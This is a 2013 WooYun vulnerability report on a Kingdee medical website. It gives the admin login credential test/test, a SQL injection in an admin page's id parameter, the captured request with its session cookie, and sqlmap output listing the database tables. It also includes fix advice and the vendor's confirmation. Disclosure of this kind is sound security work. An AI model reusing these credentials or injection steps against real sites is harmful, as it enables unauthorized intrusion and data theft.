当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-039977

漏洞标题:金蝶某后台弱口令到SQL内射

相关厂商:金蝶

漏洞作者: 小胖子

提交时间:2013-10-17 08:14

修复时间:2013-12-01 08:14

公开时间:2013-12-01 08:14

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-10-17: 细节已通知厂商并且等待厂商处理中
2013-10-17: 厂商已经确认,细节仅向厂商公开
2013-10-27: 细节向核心白帽子及相关领域专家公开
2013-11-06: 细节向普通白帽子公开
2013-11-16: 细节向实习白帽子公开
2013-12-01: 细节向公众公开

简要描述:

还是TMD弱口令

详细说明:

站点:金蝶医疗:

http://yiliao.kingdee.com


后台直接加个admin就是了,存在弱口令,test/test
进入后台。

houtai.jpg


后台的上传是FCK,但是关键的type=Flash居然创建不了文件夹,what the fuck!
然后随便点击一个编辑新闻的连接。
http://yiliao.kingdee.com/admin/customerEdit.php?id=3&types=3
id存在注射,and 1=1正常 and 1=2 错误。
带上cookies,sqlmap跑一下。

GET http://yiliao.kingdee.com/admin/customerEdit.php?id=3&types=3 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: yiliao.kingdee.com
Pragma: no-cache
Cookie: Hm_lvt_aff7fbe8fcb98b060541077cc76465f2=1381922240; PHPSESSID=6d6a994e91f280ce4c4d1a3ebdaa93a2


肯定是注入了。

SQL.jpg


然后呢。当前的数据库。

current database:    'kingdee.456cn.com'


当前数据库的表。

Database: `kingdee.456cn.com`
[9 tables]
+----------------+
| kd_activity    |
| kd_admins      |
| kd_contents    |
| kd_customer    |
| kd_customerimg |
| kd_indexad     |
| kd_jobs        |
| kd_joins       |
| kd_news        |
+----------------+


Over

漏洞证明:

见详细说明。
审核人员顺带把http://www.wooyun.org/bugs/wooyun-2013-038500/trace/6f7db3fd650bda4190780ce3666beb0c
帮我审核一下,顺带把这句删除,谢谢,辛苦思密达!

修复方案:

0x1:弱口令引发的,修复弱口令。
0x2:注入文件加上参数过滤。

版权声明:转载请注明来源 小胖子@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2013-10-17 08:33

厂商回复:

感谢“小胖子 ”热心的测试,这个是我们单位人员的后台测试帐号,马上通知修复有关漏洞!

最新状态:

暂无